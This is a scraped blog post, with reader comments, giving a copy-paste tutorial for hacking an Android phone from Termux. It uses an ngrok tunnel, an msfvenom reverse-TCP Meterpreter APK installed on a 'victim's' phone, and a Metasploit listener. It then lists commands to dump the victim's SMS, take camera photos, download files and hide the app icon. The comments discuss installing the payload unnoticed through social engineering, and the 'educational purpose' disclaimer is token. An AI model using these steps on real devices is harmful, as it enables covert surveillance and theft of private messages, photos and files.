Penetration Testing Courses

Compare courses from top universities and online platforms for

free.

Search for courses

coursary.com OPEN

for free
Compare courses in one easy search
from multiple platforms and universities.

Coursary

Open

Home Categories  About us Learn-Termux-Youtube Contact us Privacy Policy Disclaimer 

Home  Metasploit  Hack Android Phone Using Termux with Metasploit and Ngrok - 2021
FEATURED POST

Hack Android Phone Using Termux with

TERMUX ISSUES
Metasploit and Ngrok - 2021
 Saad Maqsood  January 12, 2020

Termux Repository Under

Maintenance Issue SOLVED ✅
 August 20, 2021

Hey Guys , for the past few weeks whenever

you try to use the update or any insta…

Create your website

Discover Website Builders. Browse now. FOLLOW US

Blumble Open

How to Hack android phone using Termux with

Metasploit.
In this post, we are going to learn about how to hack android phones using termux with Metasploit.
You can just copy-paste the commands one by one in the termux app and it will work perfectly.

NOTE: This post is only for educational purpose. I and this site do not support any criminal activity.
If you are doing any sort of misuse of this information This site is not responsible for that. THIS
SITE ONLY SUPPORT ETHICAL HACKING.

Requirements:
Create your website
1. Termux: If you wanna know about termux in Detail [What is termux? | Download termux in 2021]
Blumble

2. Metasploit: If you don't have Metasploit in your Termux[Install Metasploit in termux 2021]
 SOCIAL MEDIA LINKS

Port Forwarding using Ngrok in termux:    

If you wanna use Metasploit on LAN then you can skip this step(if you and your victim is connected
to the same wifi then you can skip this step).
TAGS

With the help of port forwarding, we can access the victim's phone by using mobile data which means
Advance_Hacking Basic Commands
if you are using Simcard then you have to do port forwarding to use Metasploit.
Brute-Force Cool_Features

Denial-of-Service Attack

Step 1: Encryption & Decryption Game-Hacking

Games-in-termux Information Gathering

Go to Ngrok.com and create an account. if you already have an account at ngrok then log in.
Metasploit Phishing

Programming-in-Termux Scripts

SQL-injection termux Termux for fun

Termux issues Termux-Api

Termux-Banner Termux-for-Fun

themes Top-Tools-Posts Useful-Tools

Webserver-Creation

RECENT POSTS

Termux Repository Under

Maintenance Issue SOLVED
✅
 August 20, 2021

Top 3 Termux SMS Bombing

Tools 🔥 That You Must
Know 💯
 April 09, 2021

Top 5 Theme Changing Tool

For Termux For 2021 🔥
 April 07, 2021


Step 2:

Download the Ngrok zip file on your phone.It will be approx 12Mb file.


Step 3:

Now you will see a zip file that you have downloaded from the Ngrok website.
Open termux and navigate to that zip file. If it's not in your download folder or you can't see your
download folder, just open the file manager and paste the zip file in your internal storage.and go to

termux and cd storage.

Step 4:
Type this command to copy the zip file in your Home directory of termux.

 cp ngrok-stable-linux-arm.zip /$HOME 

Step 5:
Type this command to go back to your home directory.

 cd /$HOME 

Step 6:
Type this command to unzip the file.

 unzip ngrok-stable-linux-arm.zip 

Step 7:

Go to Ngrok site again and copy the token,(please copy the full token)
Step 8:

Open terminal and type this code and paste your token and press enter.

 ./ngrok authtoken  
Step 9:

Type this command to start port forwarding on port 1275.

 ./ngrok tcp 1275 

You can use any port number i am using 1275 here.

Step 10:
If you are also getting this error just open your hotspot and it will be fixed in 30 to 60 seconds.

Create your website

Discover Website Builders. Browse now.

Blumble Open 
Create payload in Metasploit:
The payload will be an apk file which we are going to install on the victim's phone. That will allow us
to Acess the victim's android phone.

Step 1:

Open a new session in termux (just swipe your screen from left to right and click on new session).
please make sure the termux have storage permission. type below commands if you don't have the
storage permission.

 termux-setup-storage 

Allow storage permission.


Step 2:
Type this command to create a payload and press Enter.


Please change your LHOST and LPORT as given in the below image.
  msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R
>/data/data/com.termux/files/home/storage/shared/Android.apk 

Step 3:
Go to your internal storage and you will see Android.apk.
Install this apk in the victim's phone.



 Create your website
Discover Website Builders. Browse now.

Blumble Open

Start Listener (msfconsole):

Step 1:

Type this command in termux windows to start the msfconsole.

 msfconsole 

It can take upto 30 sec to start.

Step 2:

Type this command to start the Multi handler in Metasploit.

 use exploit/multi/handler 


Step 3:
Type this command to set the payload.

 set payload android/meterpreter/reverse_tcp 

Step 4:
Now set the LHOST at which you wanna listen to the session.
If you are using ngrok port forwarding then enter this IP address but if you are not using port
forwarding then enter your Local IP.

 set LHOST 127.0.0.1 

Step 5:
Now set the LPORT.
if you are using Ngrok then set the same port which you used while port forwarding.
if you are not using port forwarding then just enter the same port you used to create the payload.

 set LPORT 1275 

Step 6:
This is the last command and the phone will be Hacked.

 exploit. 

It will connect to the victim and give you meterpreter session.

[Make Your Payload apk Undetectable by Playstore Security]

Create your website

Discover Website Builders. Browse now.

Blumble Open

Some useful commands in Meterpreter. 

Find all the commands available:

This command will give you a list of commands and a short description of that command.

 help 


Get SMS from the victim's phone to your phone:

This command will give you the most recent 50 SMS from the victim,'s phone.

 dump_sms 

You will get a text file that contains all the SMS with details just use cat command to open the file.

Hide the icon of the Apk you send to the victim:

If you are installing an app on the victim's phones then it obvious that the victim gonna notice that
app and chances are the victim will uninstall the app.by using the below command you can hide the
app icon from the victim's phone.

 hide_app_icon 

Create your website

Discover Website Builders. Browse now.

Blumble Open

Change the audio mode of the victim's phone:

you can set the phone on general mode by using the below command.

 set_audio_mode -m 1 

you can type set_audio_mode -m 0 to silent the phone.

Capture pictures from the victim's phone:

This command will capture a photo from the victim's camera and send it to your storage folder.

 webcam_snap 

Access file storage of the victims: 

You can navigate to the victim's file and see all the data in any folder.
  cd /sdcard 

you can type ls command to show directories if you wanna know about the basic commands of
termux read this post.

Download any file from the victim's phone:

navigate to the file you wanna download and type this command

 download file-name 

READ: How to Hide App

icon from the victim's
phone and Stay connected
even After Victim restarts
the phone.

CONCLUSION:
So now you have a meterpreter session that means you have access to the victim's phone. but if the
victim deleted the app then you can't access the phone again, If you want to know how we can access
the phone even if the victim restarts the phone then check out [How to Hide app icon and make
persistent payload in metasploit]. If you have any Questions you can ask Me in the comments thanks
👾.
for reading and as always Stay Ethical

Create your website

Discover Website Builders. Browse now.

Blumble Open

Tags Advance_Hacking Metasploit


 Search for courses for free
Ad Coursary

Learn Ethical
Hacking - From
Scratch
Ad zsecurity.org

Hack Android
Phone Using
Termux with…
learntermux.tech

Create your
website
Ad Blumble

Hack Android
Phone Using
Termux with…
learntermux.tech

How to Hack Front

camera by
Sending a link…
learntermux.tech

YOU MAY LIKE THESE POSTS

XLR8_BOMBER Termux - Saycheese Termux - Take PUBG Phishing Tool Termux

SMS and Call Bomber for Webcam Shots From  March 06, 2021
Termux Target
 March 13, 2021  March 08, 2021

POST A COMMENT

41 Comments

UNKNOWN
 31 January 2020 at 10:14

very helpful
appreciate it

Reply Delete

 Replies
SAAD MAQSOOD
 31 January 2020 at 23:59

and i appreciate you comment 😊

Delete

 Replies
Reply

Reply
UNKNOWN
 28 February 2020 at 15:42

Hello if I close my terminal how do i get connected back to the device?

Reply Delete

 Replies
UNKNOWN
 25 August 2020 at 05:55

If I close total termux is that anyway to reconnect to the victim device

Delete

 Replies
Reply
G.KURESU REDDY
 23 November 2020 at 21:20

Nope

Delete

 Replies
Reply

Reply
SAAD MAQSOOD
 3 March 2020 at 04:51

You just have to follow the steps below

Start Listener (msfconsole):

Reply Delete

 Replies
Reply
UNKNOWN
 17 March 2020 at 04:21

will ngrok still connected if i close my terminal??

Reply Delete

 Replies
SAAD MAQSOOD
 17 March 2020 at 06:41

It will Not be connected.

Delete

 Replies
Reply
UNKNOWN 
 3 July 2020 at 02:08
 Then what to do to stay evrytime connected

Delete

 Replies
Reply

Reply
ADDIE
 13 June 2020 at 06:04

Root or not rooted?

Reply Delete

 Replies
Reply
TERMUX CODES FOR HACKING
 27 June 2020 at 08:32

Is it possible

Reply Delete

 Replies
Reply
UNKNOWN
 1 July 2020 at 21:41

Awesome 👍
Reply Delete

 Replies
Reply
UNKNOWN
 2 July 2020 at 19:36

Is this possible to stay connected with victims mobile after disconnect ngrok

Reply Delete

 Replies
Reply
UNKNOWN
 3 July 2020 at 02:57

Its imp to install Metasploit first

Reply Delete

 Replies
Reply
PRATIK MORE
 4 July 2020 at 10:47

Pratik More
Can you do Instagram bruteforce from Termux?

Reply Delete

 Replies
Reply
ANONYMOUS
 7 July 2020 at 06:22

why multiple sessions


Reply Delete
 Replies
Reply
UNKNOWN
 21 July 2020 at 08:02

Any auto install apk for victims

Reply Delete

 Replies
SAAD MAQSOOD
 21 July 2020 at 11:21

What do you mean by that?

Delete

 Replies
Reply
UNKNOWN
 22 July 2020 at 05:26

he means can we install apk payload without their notice ?

Delete

 Replies
Reply

Reply
UNKNOWN
 28 July 2020 at 10:54

That was awesome keep it up

Reply Delete

 Replies
Reply
UNKNOWN
 2 August 2020 at 22:03

how to hack not installing apk send a link to hack

Reply Delete

 Replies
Reply
WWW.LUBEGAM.COM
 4 August 2020 at 13:14

Nice I will try it but I didn't get you when you said that I have to change LHOST and LPORT
how do you change them

Reply Delete

 Replies
Reply
UNKNOWN
 8 August 2020 at 12:07

can we make apk with diffrent icon and name?

Reply Delete

 Replies
Reply
CHATHAN
 13 August 2020 at 06:47 

How much it need to bind

Reply Delete

 Replies
Reply
UNKNOWN
 13 August 2020 at 22:44

I salute your work

Reply Delete

 Replies
Reply
AJAY SINGHROHA
 14 August 2020 at 00:34

How to change LHOST AND LPORT

Reply Delete

 Replies
Reply
IAMMINE
 15 August 2020 at 04:09

Amber .. appreciate

Reply Delete

 Replies
Reply
UNKNOWN
 25 August 2020 at 03:17

If I close all those is there anyway to reconnect with the victim

Reply Delete

 Replies
Reply
SUKHSAVROOP SINGH
 30 August 2020 at 01:53

How to delete this app

Reply Delete

 Replies
Reply
UNKNOWN
 1 September 2020 at 19:09

Sir but how to send apk

Reply Delete

 Replies
ETHICAL HACKING LEARN WITH ME
 12 September 2020 at 10:31

You can use social engneering skills

Delete

 Replies
Reply

Reply
SUPERMAN

 2 September 2020 at 20:31
When I type CD downloads /then that come like this bash: cd: too many arguments
help me up

Reply Delete

 Replies
KRISH
 11 September 2020 at 17:40

You can try cd /sdcard/Download

Delete

 Replies
Reply

Reply
ESSAYS ARE EASY
 6 September 2020 at 04:59

Sir please make video on it it's not clear with this at all and I know this is working but it's
actually hard plz help sir.

Reply Delete

 Replies
Reply
UNKNOWN
 8 September 2020 at 20:54

Plz help me my exploit is not working

Reply Delete

 Replies
Reply
UNKNOWN
 9 September 2020 at 01:15

How to navigate zip file in termux?

Reply Delete

 Replies
Reply
VISHAL
 24 September 2020 at 00:47

Meterpreter session 1 closed reason died bro help me

Reply Delete

 Replies
Reply
ISQH BEPANAH
 20 January 2021 at 23:43

Video link chahiye iska

Reply Delete

 Replies
SAAD MAQSOOD
 22 January 2021 at 08:21

i will try to upload videos soon

Delete

 Replies
Reply 

Reply